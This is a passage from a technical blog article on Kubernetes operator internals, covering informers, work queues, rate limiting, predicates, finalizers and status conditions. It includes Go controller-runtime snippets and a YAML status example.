&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffyzb8t6tuye3ykpfy3xh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffyzb8t6tuye3ykpfy3xh.png" alt="image" width="800" height="482"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;Reflector&lt;/strong&gt; does the heavy lifting: it first performs a &lt;code&gt;List&lt;/code&gt; to establish the initial state, then starts a long-lived &lt;code&gt;Watch&lt;/code&gt;. If the watch connection drops (network blip, API server restart), the reflector automatically reconnects and re-lists if necessary.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;DeltaFIFO&lt;/strong&gt; queue is a clever data structure that deduplicates events for the same object. If an object is modified 10 times before the controller gets around to processing it, they're collapsed. This is the first layer of the "level-triggered" behavior.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;Local Cache&lt;/strong&gt; (a thread-safe store with indexes) is what &lt;code&gt;client.Get&lt;/code&gt; and &lt;code&gt;client.List&lt;/code&gt; read from. It's always slightly behind the API server (eventual consistency), but that's acceptable because your reconciler should be idempotent anyway.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Listers&lt;/strong&gt; are typed wrappers over the cache that let you query by namespace or label selector without hitting the network.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Reconciliation Loop in Depth
&lt;/h2&gt;

&lt;p&gt;Here's the full picture of what happens from a watch event to a completed reconciliation:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb0lal7wbgdaimwa1qyl8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb0lal7wbgdaimwa1qyl8.png" alt="image" width="800" height="1821"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A few nuances that trip people up:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The key is a namespace/name pair, not an object.&lt;/strong&gt; When your reconciler is called, you only get the namespace and name. You must re-fetch the current state of the object from the cache. Never trust stale data passed in — always re-read at the top of your reconcile function.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reconcile should be idempotent.&lt;/strong&gt; It will be called multiple times for the same state. If you create a resource, check if it already exists first. If you apply a configuration, make it declarative. A reconcile that is accidentally destructive when called twice is a ticking time bomb.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Errors vs. Requeue.&lt;/strong&gt; Returning an &lt;code&gt;error&lt;/code&gt; causes the item to be requeued with exponential backoff (respecting the rate limiter). Returning &lt;code&gt;ctrl.Result{Requeue: true}&lt;/code&gt; or &lt;code&gt;ctrl.Result{RequeueAfter: duration}&lt;/code&gt; requeues without registering an error (no backoff increment). Use the former for actual errors, the latter for polling scenarios.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Work Queues and Rate Limiting
&lt;/h2&gt;

&lt;p&gt;The work queue deserves its own section because it's where many operator performance issues originate.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0op5pacqxl2qx3w5q7vs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0op5pacqxl2qx3w5q7vs.png" alt="image" width="800" height="227"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The work queue has a built-in &lt;strong&gt;deduplication&lt;/strong&gt; guarantee: if the same namespace/name is already in the queue, adding it again is a no-op. This means a burst of 100 events for the same object results in exactly one reconciliation.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;Processing Set&lt;/strong&gt; ensures that while an item is being reconciled, any new events for that same item are queued but not dispatched until the current reconciliation completes. This prevents concurrent reconciliations for the same object.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rate limiters&lt;/strong&gt; in controller-runtime compose two strategies:&lt;/p&gt;

&lt;p&gt;The &lt;em&gt;ItemExponentialFailureRateLimiter&lt;/em&gt; tracks per-item failure counts and applies backoff: &lt;code&gt;base * 2^failures&lt;/code&gt; up to a maximum. This prevents a persistently failing object from hammering the API server.&lt;/p&gt;

&lt;p&gt;The &lt;em&gt;BucketRateLimiter&lt;/em&gt; is a global token bucket that caps overall reconciliation throughput. This protects the API server from a thundering herd when many objects need reconciliation simultaneously (e.g., after an operator restart).&lt;/p&gt;

&lt;p&gt;The default controller-runtime rate limiter combines per-item exponential backoff (base ~5ms, max ~1000s) with a global token bucket (~10 QPS, burst ~100). These defaults can vary across controller-runtime versions and are not guaranteed API contracts — always verify against your version's source. In high-scale environments, you'll almost certainly want to tune them.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Watches, Events, and Predicates
&lt;/h2&gt;

&lt;p&gt;A controller needs to know which objects to watch. The &lt;code&gt;.Watches()&lt;/code&gt; builder in controller-runtime lets you express complex watch topologies.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh528v7qiytm1chkew34x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh528v7qiytm1chkew34x.png" alt="image" width="800" height="508"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;EnqueueRequestForOwner&lt;/strong&gt; is the most common pattern: when a child resource changes (e.g., a Pod owned by your operator's StatefulSet), find the owner reference chain and enqueue the root owner. This lets the parent controller react to child state changes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;EnqueueMappedRequest&lt;/strong&gt; (formerly &lt;code&gt;EnqueueRequestsFromMapFunc&lt;/code&gt;) is a powerful escape hatch. Given any object event, you provide a function that maps it to zero or more reconcile requests. Use this for non-ownership relationships — e.g., when a shared Secret changes, requeue all operators that reference it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Predicates&lt;/strong&gt; filter events before they hit the queue. This is a critical optimization that's often overlooked:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// Only reconcile when spec changes, not on every status update&lt;/span&gt;
&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewControllerManagedBy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;mgr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;
    &lt;span class="n"&gt;For&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt;
        &lt;span class="n"&gt;builder&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;WithPredicates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;predicate&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GenerationChangedPredicate&lt;/span&gt;&lt;span class="p"&gt;{}))&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;
    &lt;span class="n"&gt;Complete&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;GenerationChangedPredicate&lt;/code&gt; is particularly valuable — it only triggers reconciliation when &lt;code&gt;metadata.generation&lt;/code&gt; increments (which only happens on spec changes), ignoring pure status updates. Without this, every status write your controller does triggers another reconciliation, creating a tight loop.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Ownership, Finalizers, and Garbage Collection
&lt;/h2&gt;

&lt;p&gt;This triad is where operator bugs tend to cluster. Let's be precise.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Owner References&lt;/strong&gt; establish the parent-child relationship for garbage collection:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjncia8yvcr1qo6r0c0yo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjncia8yvcr1qo6r0c0yo.png" alt="image" width="800" height="241"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Finalizer deletion flow&lt;/strong&gt; — what happens step by step when a user deletes an object with a finalizer:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdl2mcz6av4fvyktp5lz1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdl2mcz6av4fvyktp5lz1.png" alt="image" width="537" height="1804"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Owner references tell the Kubernetes garbage collector that child objects should be deleted when the parent is deleted. Always set owner references on resources you create — without them, orphaned resources accumulate in the cluster.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SetControllerReference&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;database&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;statefulSet&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Scheme&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This sets the child's &lt;code&gt;metadata.ownerReferences&lt;/code&gt; to point to the parent, with &lt;code&gt;controller: true&lt;/code&gt; and &lt;code&gt;blockOwnerDeletion: true&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Finalizers&lt;/strong&gt; are strings in &lt;code&gt;metadata.finalizers&lt;/code&gt; that prevent an object from being deleted until all finalizers are removed. When a user deletes an object with finalizers, Kubernetes sets &lt;code&gt;metadata.deletionTimestamp&lt;/code&gt; but doesn't remove the object. Your controller must detect this, do cleanup work, remove its finalizer, and then update the object — at which point Kubernetes deletes it.&lt;/p&gt;

&lt;p&gt;Common finalizer pattern:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="n"&gt;myFinalizer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"mycompany.io/database-finalizer"&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Reconciler&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;Reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;db&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;{}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NamespacedName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IgnoreNotFound&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DeletionTimestamp&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IsZero&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c"&gt;// Object is being deleted&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;controllerutil&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ContainsFinalizer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;myFinalizer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;runCleanup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="n"&gt;controllerutil&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;RemoveFinalizer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;myFinalizer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c"&gt;// Add finalizer if not present&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;controllerutil&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ContainsFinalizer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;myFinalizer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;controllerutil&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;AddFinalizer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;myFinalizer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c"&gt;// Normal reconciliation...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;A critical warning&lt;/strong&gt;: Finalizer logic must be robust and eventually complete. A finalizer that never removes itself will prevent the object from being garbage collected forever. Always provide a way to force-remove the finalizer in operational runbooks.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Status Subresource and Conditions
&lt;/h2&gt;

&lt;p&gt;Your operator's primary communication channel with users (and other systems) is the &lt;code&gt;status&lt;/code&gt; field. Get this right.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo4vixpelyuftt8nj12bg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo4vixpelyuftt8nj12bg.png" alt="image" width="800" height="675"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Always use the &lt;strong&gt;Conditions&lt;/strong&gt; pattern for status. It's the Kubernetes-idiomatic way to communicate multi-dimensional state. The example below uses condition types modeled after the common Kubernetes Deployment pattern — adapt the types to your domain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;phase&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Running&lt;/span&gt;
  &lt;span class="na"&gt;observedGeneration&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5&lt;/span&gt;    &lt;span class="c1"&gt;# which spec generation this status reflects&lt;/span&gt;
  &lt;span class="na"&gt;conditions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Ready&lt;/span&gt;
      &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;True"&lt;/span&gt;
      &lt;span class="na"&gt;lastTransitionTime&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;2024-01-15T10:00:00Z"&lt;/span&gt;
      &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AllReplicasReady&lt;/span&gt;
      &lt;span class="na"&gt;message&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;3/3&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;replicas&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;are&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;ready"&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Progressing&lt;/span&gt;
      &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;False"&lt;/span&gt;
      &lt;span class="na"&gt;lastTransitionTime&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;2024-01-15T10:01:00Z"&lt;/span&gt;
      &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ReplicaSetAvailable&lt;/span&gt;
      &lt;span class="na"&gt;message&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Rollout&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;complete"&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Available&lt;/span&gt;
      &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;True"&lt;/span&gt;
      &lt;span class="na"&gt;lastTransitionTime&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;2024-01-14T08:00:00Z"&lt;/span&gt;
      &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;MinimumReplicasAvailable&lt;/span&gt;
      &lt;span class="na"&gt;message&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Deployment&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;has&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;minimum&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;availability"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;&lt;code&gt;observedGeneration&lt;/code&gt;&lt;/strong&gt; is critical and frequently missed. It tells observers which version of the spec this status corresponds to. Without it, you can't tell if &lt;code&gt;status.phase: Running&lt;/code&gt; means "running the spec you just applied" or "running an older spec while the new one is being processed."&lt;/p&gt;

&lt;p&gt;Always update status with &lt;code&gt;r.Status().Update(ctx, obj)&lt;/code&gt; not &lt;code&gt;r.Update(ctx, obj)&lt;/code&gt;. The status subresource has a separate endpoint and a separate RBAC policy. The main update endpoint ignores status changes; the status endpoint ignores spec changes.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Generation vs ObservedGeneration: A Deep Dive
&lt;/h2&gt;

&lt;p&gt;This is one of the most misunderstood mechanics in operator development, yet it's fundamental to building correct status reporting. Let's be precise.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;metadata.generation&lt;/code&gt; is a monotonically incrementing integer managed entirely by the API server. It increments &lt;strong&gt;only when the spec changes&lt;/strong&gt; — status updates, label changes, and annotation changes do not increment it. This is why &lt;code&gt;GenerationChangedPredicate&lt;/code&gt; works: it filters out the noise.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;status.observedGeneration&lt;/code&gt; is a field your controller writes to &lt;code&gt;status&lt;/code&gt; after completing a reconciliation. It should be set to the &lt;code&gt;metadata.generation&lt;/code&gt; value of the object you just reconciled.&lt;/p&gt;

